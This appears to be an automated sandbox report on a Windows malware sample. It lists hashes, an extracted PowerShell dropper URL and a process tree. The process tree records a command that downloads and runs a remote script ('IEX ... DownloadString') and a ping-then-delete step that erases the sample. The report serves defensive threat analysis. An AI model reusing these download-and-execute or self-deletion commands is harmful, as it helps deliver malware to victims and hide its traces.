Analysis

  • max time kernel
    1s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    13-10-2023 02:20

General

  • Target

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe

  • Size

    247KB

  • MD5

    f17afa21e88b7a362db5ae8fdfa43de9

  • SHA1

    14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e

  • SHA256

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf

  • SHA512

    efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d

  • SSDEEP

    3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://aszfiltration.com/storage/files/debug2.ps1

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2188
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe" >> NUL
      2⤵
        PID:2516
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')
      1⤵
        PID:1312

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1312-4-0x000000001B3A0000-0x000000001B682000-memory.dmp

        Filesize

        2.9MB

      • memory/1312-6-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

        Filesize

        9.6MB

      • memory/1312-5-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

        Filesize

        32KB

      • memory/1312-8-0x00000000029C0000-0x0000000002A40000-memory.dmp

        Filesize

        512KB

      • memory/1312-10-0x00000000029C0000-0x0000000002A40000-memory.dmp

        Filesize

        512KB

      • memory/1312-9-0x00000000029C0000-0x0000000002A40000-memory.dmp

        Filesize

        512KB

      • memory/1312-7-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

        Filesize

        9.6MB

      • memory/1312-11-0x00000000029C0000-0x0000000002A40000-memory.dmp

        Filesize

        512KB

      • memory/1312-12-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

        Filesize

        9.6MB